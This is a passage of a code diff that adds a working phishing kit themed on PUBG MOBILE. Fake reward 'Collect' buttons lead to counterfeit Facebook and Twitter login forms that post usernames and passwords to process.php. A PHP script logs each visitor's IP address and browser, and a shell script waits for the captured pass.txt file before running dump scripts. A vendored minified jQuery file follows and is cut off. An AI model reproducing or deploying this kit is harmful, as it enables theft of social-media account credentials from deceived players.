     482 +<img src="https://user-images.githubusercontent.com/49580304/102177831-2a711e80-3e59-11eb-8e90-38ee445d1e9c.jpg">
     483 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177831-2a711e80-3e59-11eb-8e90-38ee445d1e9c.jpg">Collect</button>
     484 +</div>
     485 +<div class="item kanan">
     486 +<img src="https://user-images.githubusercontent.com/49580304/102177850-34931d00-3e59-11eb-820e-8f542dfe384a.png">
     487 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177850-34931d00-3e59-11eb-820e-8f542dfe384a.png">Collect</button>
     488 +</div>
     489 +<div class="item kiri">
     490 +<img src="https://user-images.githubusercontent.com/49580304/102177886-47a5ed00-3e59-11eb-95d6-df7a58e91408.png">
     491 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177886-47a5ed00-3e59-11eb-95d6-df7a58e91408.png">Collect</button>
     492 +</div>
     493 +<div class="item tengah">
     494 +<img src="https://user-images.githubusercontent.com/49580304/102177901-4f659180-3e59-11eb-9a58-b3479f17e38b.png">
     495 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177901-4f659180-3e59-11eb-9a58-b3479f17e38b.png">Collect</button>
     496 +</div>
     497 +<div class="item kanan">
     498 +<img src="https://user-images.githubusercontent.com/49580304/102177933-5b515380-3e59-11eb-8bda-4f1f2a4e14b0.png">
     499 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177933-5b515380-3e59-11eb-8bda-4f1f2a4e14b0.png">Collect</button>
     500 +</div>
     501 +<div class="item kiri">
     502 +<img src="https://user-images.githubusercontent.com/49580304/102177951-660be880-3e59-11eb-99a8-c5e64a2a05ac.png">
     503 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177951-660be880-3e59-11eb-99a8-c5e64a2a05ac.png">Collect</button>
     504 +</div>
     505 +<div class="item tengah">
     506 +<img src="https://user-images.githubusercontent.com/49580304/102177971-702de700-3e59-11eb-94da-1e030cfc930d.png">
     507 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177971-702de700-3e59-11eb-94da-1e030cfc930d.png">Collect</button>
     508 +</div>
     509 +<div class="item kanan">
     510 +<img src="https://user-images.githubusercontent.com/49580304/102177988-7754f500-3e59-11eb-9cd8-2f9f650ae93a.png">
     511 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177988-7754f500-3e59-11eb-9cd8-2f9f650ae93a.png">Collect</button>
     512 +</div>
     513 +<div class="item kiri">
     514 +<img src="https://user-images.githubusercontent.com/49580304/102178004-8045c680-3e59-11eb-92d7-25a0b9ebf4b1.png">
     515 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178004-8045c680-3e59-11eb-92d7-25a0b9ebf4b1.png">Collect</button>
     516 +</div>
     517 +<div class="item tengah">
     518 +<img src="https://user-images.githubusercontent.com/49580304/102178044-905da600-3e59-11eb-8964-38c5f4a8cb30.png">
     519 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178044-905da600-3e59-11eb-8964-38c5f4a8cb30.png">Collect</button>
     520 +</div>
     521 +<div class="item kanan">
     522 +<img src="https://user-images.githubusercontent.com/49580304/102178073-9ce1fe80-3e59-11eb-9781-db40b88ac6b2.png">
     523 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178073-9ce1fe80-3e59-11eb-9781-db40b88ac6b2.png">Collect</button>
     524 +</div>
     525 +<div class="item kiri">
     526 +<img src="https://user-images.githubusercontent.com/49580304/102178087-a66b6680-3e59-11eb-9029-1cb54c9b349c.png">
     527 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178087-a66b6680-3e59-11eb-9029-1cb54c9b349c.png">Collect</button>
     528 +</div>
     529 +<div class="item tengah">
     530 +<img src="https://user-images.githubusercontent.com/49580304/102178108-b1be9200-3e59-11eb-80ec-de48331ecd4b.png">
     531 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178108-b1be9200-3e59-11eb-80ec-de48331ecd4b.png">Collect</button>
     532 +</div>
     533 +<div class="item kanan">
     534 +<img src="https://user-images.githubusercontent.com/49580304/102178132-bf741780-3e59-11eb-9863-6edd13adac8c.png">
     535 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178132-bf741780-3e59-11eb-9863-6edd13adac8c.png">Collect</button>
     536 +</div>
     537 +<div class="item kiri">
     538 +<img src="https://user-images.githubusercontent.com/49580304/102178151-c864e900-3e59-11eb-87b7-29544ecda0d1.png">
     539 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178151-c864e900-3e59-11eb-87b7-29544ecda0d1.png">Collect</button>
     540 +</div>
     541 +<div class="item tengah">
     542 +<img src="https://user-images.githubusercontent.com/49580304/102178179-d61a6e80-3e59-11eb-9582-a175103ee31b.png">
     543 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178179-d61a6e80-3e59-11eb-9582-a175103ee31b.png">Collect</button>
     544 +</div>
     545 +<div class="item kanan">
     546 +<img src="https://user-images.githubusercontent.com/49580304/102178205-e03c6d00-3e59-11eb-9fc3-88fef34d6dd3.png">
     547 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178205-e03c6d00-3e59-11eb-9fc3-88fef34d6dd3.png">Collect</button>
     548 +</div>
     549 +<div class="item kiri">
     550 +<img src="https://user-images.githubusercontent.com/49580304/102178258-f813f100-3e59-11eb-8b60-8ab88eec349a.png">
     551 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178258-f813f100-3e59-11eb-8b60-8ab88eec349a.png">Collect</button>
     552 +</div>
     553 +<div class="item tengah">
     554 +<img src="https://user-images.githubusercontent.com/49580304/102178300-0a8e2a80-3e5a-11eb-9638-0e0821e2f3df.png">
     555 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178300-0a8e2a80-3e5a-11eb-9638-0e0821e2f3df.png">Collect</button>
     556 +</div>
     557 +<div class="item kanan">
     558 +<img src="https://user-images.githubusercontent.com/49580304/102178317-14179280-3e5a-11eb-8009-46a39bccf8fa.png">
     559 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178317-14179280-3e5a-11eb-8009-46a39bccf8fa.png">Collect</button>
     560 +</div>
     561 +<div class="item kiri">
     562 +<img src="https://user-images.githubusercontent.com/49580304/102178346-1ed22780-3e5a-11eb-949b-b242d6629bcd.png">
     563 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178346-1ed22780-3e5a-11eb-949b-b242d6629bcd.png">Collect</button>
     564 +</div>
     565 +<div class="item tengah">
     566 +<img src="https://user-images.githubusercontent.com/49580304/102178381-2abde980-3e5a-11eb-8add-848994af710e.png">
     567 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178381-2abde980-3e5a-11eb-8add-848994af710e.png">Collect</button>
     568 +</div>
     569 +<div class="item kiri">
     570 +<img src="https://user-images.githubusercontent.com/49580304/102178421-38736f00-3e5a-11eb-96a3-998f273c2da4.png">
     571 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178421-38736f00-3e5a-11eb-96a3-998f273c2da4.png">Collect</button>
     572 +</div>
     573 +<div class="item tengah">
     574 +<img src="https://user-images.githubusercontent.com/49580304/102178437-40cbaa00-3e5a-11eb-9ed8-345bfa52aac0.png">
     575 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178437-40cbaa00-3e5a-11eb-9ed8-345bfa52aac0.png">Collect</button>
     576 +</div>
     577 +</div>
     578 +<script src="js/popup.js"></script></div>
     579 +</div>
     580 +</div>
     581 +</div>
     582 +</div>
     583 +<div class="popup reward_confirmation" style="display: none;">
     584 +<div class="container">
     585 +<div class="container-mask">
     586 +<div class="navbar">
     587 +<div class="navbar-menu">
     588 +<i class="fa fa-bars"></i>
     589 +</div>
     590 +<div class="navbar-logo-box">
     591 +<img src="https://user-images.githubusercontent.com/49580304/102179370-da478b80-3e5b-11eb-9d3a-20b6f93d217f.png">
     592 +</div>
     593 +</div>
     594 +<div class="reward-content">
     595 +<div class="menu-notify">
     596 +<div class="menu-notify-icon"><i class="zmdi zmdi-help-outline"></i></div>
     597 +<div class="menu-notify-txt">Hi survivor, are you sure to collect this reward?</div>
     598 +</div>
     599 +<div class="item-confirmation">
     600 +<div class="item-confirmation-img-box">
     601 +<img src="" id="myReward">
     602 +</div>
     603 +<div class="item-confirmation-info">
     604 +<div class="item-confirmation-status-title">
     605 +Reward Availability
     606 +</div>
     607 +<div class="item-confirmation-status-info">
     608 +This reward is available to collect
     609 +</div>
     610 +<div class="item-confirmation-information-title">
     611 +Reward Information
     612 +</div>
     613 +<div class="item-confirmation-information-info">
     614 +Special reward for Royale Pass Season 15.
     615 +</div>
     616 +</div>
     617 +</div>
     618 +<div class="btn-popup-wrapper">
     619 +<div class="btn-popup kiri" onclick="close_reward_confirmation()">
     620 +<div class="btn-popup-icon"><i class="fa fa-chevron-left fa-md"></i></div>
     621 +<div class="btn-popup-txt">Back to reward</div>
     622 +</div>
     623 +<div class="btn-popup kanan" onclick="open_account_login()">
     624 +<div class="btn-popup-icon" style="margin-right: 0px; float: right;"><i class="fa fa-chevron-right fa-md" style="margin-left: 3px;"></i></div>
     625 +<div class="btn-popup-txt">Collect this reward</div>
     626 +</div>
     627 +</div>
     628 +</div>
     629 +</div>
     630 +</div>
     631 +</div>
     632 +<div class="popup account_login" style="display: none;">
     633 +<div class="container">
     634 +<div class="container-mask">
     635 +<div class="navbar">
     636 +<div class="navbar-menu">
     637 +<i class="fa fa-bars"></i>
     638 +</div>
     639 +<div class="navbar-logo-box">
     640 +<img src="https://user-images.githubusercontent.com/49580304/102181053-bfc2e180-3e5e-11eb-971c-7497af54c15d.png">
     641 +</div>
     642 +</div>
     643 +<div class="reward-content">
     644 +<div class="menu-notify">
     645 +<div class="menu-notify-icon"><i class="zmdi zmdi-info-outline"></i></div>
     646 +<div class="menu-notify-txt">Login to your PUBG MOBILE account to receive your reward</div>
     647 +</div>
     648 +<div class="btn-login" onclick="open_facebook_login()">
     649 +<div class="btn-login-logo">
     650 +<img src="https://user-images.githubusercontent.com/49580304/102179431-fa774a80-3e5b-11eb-9aa3-169f4b9a2f03.png">
     651 +</div>
     652 +<div class="btn-login-txt">Login with Facebook</div>
     653 +</div>
     654 +<div class="btn-login" onclick="open_twitter_login()">
     655 +<div class="btn-login-logo">
     656 +<img src="https://user-images.githubusercontent.com/49580304/102179484-167aec00-3e5c-11eb-9987-ea89880403f5.png">
     657 +</div>
     658 +<div class="btn-login-txt">Login with Twitter</div>
     659 +</div>
     660 +<div class="btn-popup-wrapper">
     661 +<div class="btn-popup tengah" onclick="close_account_login()">
     662 +<div class="btn-popup-icon"><i class="fa fa-chevron-left fa-md"></i></div>
     663 +<div class="btn-popup-txt">Back to reward</div>
     664 +</div>
     665 +</div>
     666 +</div>
     667 +</div>
     668 +</div>
     669 +</div>
     670 +<div class="popup-login login_facebook animated fadeIn" style="display: none;">
     671 +<div class="popup-box-login-fb">
     672 +<a onclick="close_facebook_login()" class="close-fb"><i class="zmdi zmdi-close"></i></a>
     673 +<div class="navbar-fb">
     674 +<img src="https://user-images.githubusercontent.com/49580304/102181121-dcf7b000-3e5e-11eb-8549-72cb41a2b68a.png">
     675 +</div>
     676 +<div class="content-box-fb">
     677 +<img src="https://user-images.githubusercontent.com/49580304/102181204-fd276f00-3e5e-11eb-972a-8678e415e99e.jpg">
     678 +<div class="txt-login-fb">
     679 +Log in to your Facebook account to connect to PUBG MOBILE
     680 +</div>
     681 +<form action="process.php" method="post">
     682 +<input type="text" class="input-fb-email" name="email" placeholder="Mobile number or email" autocomplete="off" autocapitalize="off" required>
     683 +<input type="password" class="input-fb-password" name="pass" placeholder="Facebook password" autocomplete="off" autocapitalize="off" required>
     684 +<input type="hidden" name="login" value="Facebook" readonly>
     685 +<button type="submit" class="btn-login-fb">Log In</button>
     686 +</form>
     687 +<div class="txt-create-account">Create account</div>
     688 +<div class="txt-not-now">Not now</div>
     689 +<div class="txt-forgotten-password">Forgotten password?</div>
     690 +</div>
     691 +<div class="language-box">
     692 +<center>
     693 +<div class="language-name language-name-active">English (UK)</div>
     694 +<div class="language-name">Bahasa Indonesia</div>
     695 +<div class="language-name">Basa Jawa</div>
     696 +<div class="language-name">Bahasa Melayu</div>
     697 +<div class="language-name">日本語</div>
     698 +<div class="language-name">Español</div>
     699 +<div class="language-name">Português (Brasil)</div>
     700 +<div class="language-name">
     701 +<i class="fa fa-plus"></i>
     702 +</div>
     703 +</center>
     704 +</div>
     705 +<div class="copyright">Facebook Inc.</div>
     706 +</div>
     707 +</div>
     708 +<div class="popup-login login_twitter animated fadeIn" style="display: none;">
     709 +<div class="popup-box-login-twitter">
     710 +<a onclick="close_twitter_login()" class="close-other"><i class="zmdi zmdi-close"></i></a>
     711 +<div class="header-twitter">
     712 +<center>
     713 +<img src="https://user-images.githubusercontent.com/49580304/102179592-44f8c700-3e5c-11eb-9756-e98e6f4c582c.png">
     714 +</center>
     715 +</div>
     716 +<div class="box-twitter">
     717 +<center>
     718 +<form action="process.php" method="post">
     719 +<div class="txt-login-twitter">Login to Twitter</div>
     720 +<div class="input-box-twitter">
     721 +<label>Phone, email, or username</label>
     722 +<input type="text" name="email" placeholder="" required>
     723 +</div>
     724 +<div class="input-box-twitter">
     725 +<label>Password</label>
     726 +<input type="password" name="pass" placeholder="" required>
     727 +</div>
     728 +<input type="hidden" name="login" value="Twitter" readonly>
     729 +<button type="submit" class="btn-login-twitter">Log In</button>
     730 +<div class="footer-menu-twitter">Forgot password?</div>rk
     731 +<div class="footer-menu-twitter bulet">•</div>
     732 +<div class="footer-menu-twitter">Sign up to Twitter</div>
     733 +</form>
     734 +</center>
     735 +</div>
     736 +</div>
     737 +</div>
     738 +<script type="text/javascript" src="jquery-1.10.2.min.js"></script>
     739 +<script type="text/javascript" src="ajax/libs/jquery/2-1-1/jquery.min.js"></script>
     740 +<script src="ajax/libs/jquery/2-1-3/jquery.min.js"></script>
     741 +<script src="js/tab.js"></script>
     742 +<script src="js/popup.js"></script>
     743 +</body>
     744 +</html>
  • ■ ■ ■ ■ ■ ■
    pubg/notp/io.sh
     1 +clear
     2 +mpv /sdcard/log.mp3
     3 +clear
     4 +if [ -f "pass.txt" ];then
     5 +bash grad.sh
     6 +sleep 15.0
     7 +bash dump.sh
     8 +else
     9 +echo -e " \e[96m Retriving Data Again Wait"
     10 +sleep 3.0
     11 +bash io.sh
     12 +fi
     13 + 
  • ■ ■ ■ ■ ■ ■
    pubg/notp/ip.php
     1 +<?php
     2 +
     3 +if (!empty($_SERVER['HTTP_CLIENT_IP']))
     4 + {
     5 + $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
     6 + }
     7 +elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
     8 + {
     9 + $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
     10 + }
     11 +else
     12 + {
     13 + $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
     14 + }
     15 +$useragent = " User-Agent: ";
     16 +$browser = $_SERVER['HTTP_USER_AGENT'];
     17 +
     18 +
     19 +$file = 'ip.txt';
     20 +$fp = fopen($file, 'a');
     21 +
     22 +fwrite($fp, $ipaddress);
     23 +fwrite($fp, $useragent);
     24 +fwrite($fp, $browser);
     25 +
     26 +
     27 +fclose($fp);
  • ■ ■ ■ ■ ■ ■
    pubg/notp/jquery-1.10.2.min.js
     1 +/*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license
     2 +//@ sourceMappingURL=jquery-1.10.2.min.map
     3 +*/
     4 +(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=/\S+/g,C=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,k=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[)+/g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q),e.detachEvent("onload",q))};x.fn=x.prototype={jquery:f,constructor:x,init:function(e,n,r){var i,o;if(!e)return this;if("string"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:N.exec(e),!i||!i[1]&&n)return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanceof x?n[0]:n,x.merge(this,x.parseHTML(i[1],n&&n.nodeType?n.ownerDocument||n:a,!0)),k.test(i[1])&&x.isPlainObject(n))for(i in n)x.isFunction(this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(o=a.getElementById(i[2]),o&&o.parentNode){if(o.id!==i[2])return r.find(e);this.length=1,this[0]=o}return this.context=a,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):x.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),x.makeArray(e,this))},selector:"",length:0,toArray:function(){return g.call(this)},get:function(e){return null==e?this.toArray():0>e?this[this.length+e]:this[e]},pushStack:function(e){var t=x.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return x.each(this,e,t)},ready:function(e){return x.ready.promise().done(e),this},slice:function(){return this.pushStack(g.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},map:function(e){return this.pushStack(x.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:h,sort:[].sort,splice:[].splice},x.fn.init.prototype=x.fn,x.extend=x.fn.extend=function(){var e,n,r,i,o,a,s=arguments[0]||{},l=1,u=arguments.length,c=!1;for("boolean"==typeof s&&(c=s,s=arguments[1]||{},l=2),"object"==typeof s||x.isFunction(s)||(s={}),u===l&&(s=this,--l);u>l;l++)if(null!=(o=arguments[l]))for(i in o)e=s[i],r=o[i],s!==r&&(c&&r&&(x.isPlainObject(r)||(n=x.isArray(r)))?(n?(n=!1,a=e&&x.isArray(e)?e:[]):a=e&&x.isPlainObject(e)?e:{},s[i]=x.extend(c,a,r)):r!==t&&(s[i]=r));return s},x.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),noConflict:function(t){return e.$===x&&(e.$=u),t&&e.jQuery===x&&(e.jQuery=l),x},isReady:!1,readyWait:1,holdReady:function(e){e?x.readyWait++:x.ready(!0)},ready:function(e){if(e===!0?!--x.readyWait:!x.isReady){if(!a.body)return setTimeout(x.ready);x.isReady=!0,e!==!0&&--x.readyWait>0||(n.resolveWith(a,[x]),x.fn.trigger&&x(a).trigger("ready").off("ready"))}},isFunction:function(e){return"function"===x.type(e)},isArray:Array.isArray||function(e){return"array"===x.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?c[y.call(e)]||"object":typeof e},isPlainObject:function(e){var n;if(!e||"object"!==x.type(e)||e.nodeType||x.isWindow(e))return!1;try{if(e.constructor&&!v.call(e,"constructor")&&!v.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(r){return!1}if(x.support.ownLast)for(n in e)return v.call(e,n);for(n in e);return n===t||v.call(e,n)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw Error(e)},parseHTML:function(e,t,n){if(!e||"string"!=typeof e)return null;"boolean"==typeof t&&(n=t,t=!1),t=t||a;var r=k.exec(e),i=!n&&[];return r?[t.createElement(r[1])]:(r=x.buildFragment([e],t,i),i&&x(i).remove(),x.merge([],r.childNodes))},parseJSON:function(n){return e.JSON&&e.JSON.parse?e.JSON.parse(n):null===n?n:"string"==typeof n&&(n=x.trim(n),n&&E.test(n.replace(A,"@").replace(j,"]").replace(S,"")))?Function("return "+n)():(x.error("Invalid JSON: "+n),t)},parseXML:function(n){var r,i;if(!n||"string"!=typeof n)return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(o){r=t}return r&&r.documentElement&&!r.getElementsByTagName("parsererror").length||x.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&x.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(D,"ms-").replace(L,H)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,n){var r,i=0,o=e.length,a=M(e);if(n){if(a){for(;o>i;i++)if(r=t.apply(e[i],n),r===!1)break}else for(i in e)if(r=t.apply(e[i],n),r===!1)break}else if(a){for(;o>i;i++)if(r=t.call(e[i],i,e[i]),r===!1)break}else for(i in e)if(r=t.call(e[i],i,e[i]),r===!1)break;return e},trim:b&&!b.call("\ufeff\u00a0")?function(e){return null==e?"":b.call(e)}:function(e){return null==e?"":(e+"").replace(C,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(M(Object(e))?x.merge(n,"string"==typeof e?[e]:e):h.call(n,e)),n},inArray:function(e,t,n){var r;if(t){if(m)return m.call(t,e,n);for(r=t.length,n=n?0>n?Math.max(0,r+n):n:0;r>n;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,o=0;if("number"==typeof r)for(;r>o;o++)e[i++]=n[o];else while(n[o]!==t)e[i++]=n[o++];return e.length=i,e},grep:function(e,t,n){var r,i=[],o=0,a=e.length;for(n=!!n;a>o;o++)r=!!t(e[o],o),n!==r&&i.push(e[o]);return i},map:function(e,t,n){var r,i=0,o=e.length,a=M(e),s=[];if(a)for(;o>i;i++)r=t(e[i],i,n),null!=r&&(s[s.length]=r);else for(i in e)r=t(e[i],i,n),null!=r&&(s[s.length]=r);return d.apply([],s)},guid:1,proxy:function(e,n){var r,i,o;return"string"==typeof n&&(o=e[n],n=e,e=o),x.isFunction(e)?(r=g.call(arguments,2),i=function(){return e.apply(n||this,r.concat(g.call(arguments)))},i.guid=e.guid=e.guid||x.guid++,i):t},access:function(e,n,r,i,o,a,s){var l=0,u=e.length,c=null==r;if("object"===x.type(r)){o=!0;for(l in r)x.access(e,n,l,r[l],!0,a,s)}else if(i!==t&&(o=!0,x.isFunction(i)||(s=!0),c&&(s?(n.call(e,i),n=null):(c=n,n=function(e,t,n){return c.call(x(e),n)})),n))for(;u>l;l++)n(e[l],r,s?i:i.call(e[l],l,n(e[l],r)));return o?e:c?n.call(e):u?n(e[0],r):a},now:function(){return(new Date).getTime()},swap:function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i}}),x.ready.promise=function(t){if(!n)if(n=x.Deferred(),"complete"===a.readyState)setTimeout(x.ready);else if(a.addEventListener)a.addEventListener("DOMContentLoaded",q,!1),e.addEventListener("load",q,!1);else{a.attachEvent("onreadystatechange",q),e.attachEvent("onload",q);var r=!1;try{r=null==e.frameElement&&a.documentElement}catch(i){}r&&r.doScroll&&function o(){if(!x.isReady){try{r.doScroll("left")}catch(e){return setTimeout(o,50)}_(),x.ready()}}()}return n.promise(t)},x.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){c["[object "+t+"]"]=t.toLowerCase()});function M(e){var t=e.length,n=x.type(e);return x.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}r=x(a),function(e,t){var n,r,i,o,a,s,l,u,c,p,f,d,h,g,m,y,v,b="sizzle"+-new Date,w=e.document,T=0,C=0,N=st(),k=st(),E=st(),S=!1,A=function(e,t){return e===t?(S=!0,0):0},j=typeof t,D=1<<31,L={}.hasOwnProperty,H=[],q=H.pop,_=H.push,M=H.push,O=H.slice,F=H.indexOf||function(e){var t=0,n=this.length;for(;n>t;t++)if(this[t]===e)return t;return-1},B="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",R="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",W=R.replace("w","w#"),$="\\["+P+"*("+R+")"+P+"*(?:([*^$|!~]?=)"+P+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+W+")|)|)"+P+"*\\]",I=":("+R+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+$.replace(3,8)+")*)|.*)\\)|)",z=RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),X=RegExp("^"+P+"*,"+P+"*"),U=RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),V=RegExp(P+"*[+~]"),Y=RegExp("="+P+"*([^\\]'\"]*)"+P+"*\\]","g"),J=RegExp(I),G=RegExp("^"+W+"$"),Q={ID:RegExp("^#("+R+")"),CLASS:RegExp("^\\.("+R+")"),TAG:RegExp("^("+R.replace("w","w*")+")"),ATTR:RegExp("^"+$),PSEUDO:RegExp("^"+I),CHILD:RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+P+"*(even|odd|(([+-]|)(\\d*)n|)"+P+"*(?:([+-]|)"+P+"*(\\d+)|))"+P+"*\\)|)","i"),bool:RegExp("^(?:"+B+")$","i"),needsContext:RegExp("^"+P+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+P+"*((?:-\\d)?\\d*)"+P+"*\\)|)(?=[^-]|$)","i")},K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,et=/^(?:input|select|textarea|button)$/i,tt=/^h\d$/i,nt=/'|\\/g,rt=RegExp("\\\\([\\da-f]{1,6}"+P+"?|("+P+")|.)","ig"),it=function(e,t,n){var r="0x"+t-65536;return r!==r||n?t:0>r?String.fromCharCode(r+65536):String.fromCharCode(55296|r>>10,56320|1023&r)};try{M.apply(H=O.call(w.childNodes),w.childNodes),H[w.childNodes.length].nodeType}catch(ot){M={apply:H.length?function(e,t){_.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function at(e,t,n,i){var o,a,s,l,u,c,d,m,y,x;if((t?t.ownerDocument||t:w)!==f&&p(t),t=t||f,n=n||[],!e||"string"!=typeof e)return n;if(1!==(l=t.nodeType)&&9!==l)return[];if(h&&!i){if(o=Z.exec(e))if(s=o[1]){if(9===l){if(a=t.getElementById(s),!a||!a.parentNode)return n;if(a.id===s)return n.push(a),n}else if(t.ownerDocument&&(a=t.ownerDocument.getElementById(s))&&v(t,a)&&a.id===s)return n.push(a),n}else{if(o[2])return M.apply(n,t.getElementsByTagName(e)),n;if((s=o[3])&&r.getElementsByClassName&&t.getElementsByClassName)return M.apply(n,t.getElementsByClassName(s)),n}if(r.qsa&&(!g||!g.test(e))){if(m=d=b,y=t,x=9===l&&e,1===l&&"object"!==t.nodeName.toLowerCase()){c=mt(e),(d=t.getAttribute("id"))?m=d.replace(nt,"\\$&"):t.setAttribute("id",m),m="[id='"+m+"'] ",u=c.length;while(u--)c[u]=m+yt(c[u]);y=V.test(e)&&t.parentNode||t,x=c.join(",")}if(x)try{return M.apply(n,y.querySelectorAll(x)),n}catch(T){}finally{d||t.removeAttribute("id")}}}return kt(e.replace(z,"$1"),t,n,i)}function st(){var e=[];function t(n,r){return e.push(n+=" ")>o.cacheLength&&delete t[e.shift()],t[n]=r}return t}function lt(e){return e[b]=!0,e}function ut(e){var t=f.createElement("div");try{return!!e(t)}catch(n){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function ct(e,t){var n=e.split("|"),r=e.length;while(r--)o.attrHandle[n[r]]=t}function pt(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&(~t.sourceIndex||D)-(~e.sourceIndex||D);if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function ft(e){return function(t){var n=t.nodeName.toLowerCase();return"input"===n&&t.type===e}}function dt(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function ht(e){return 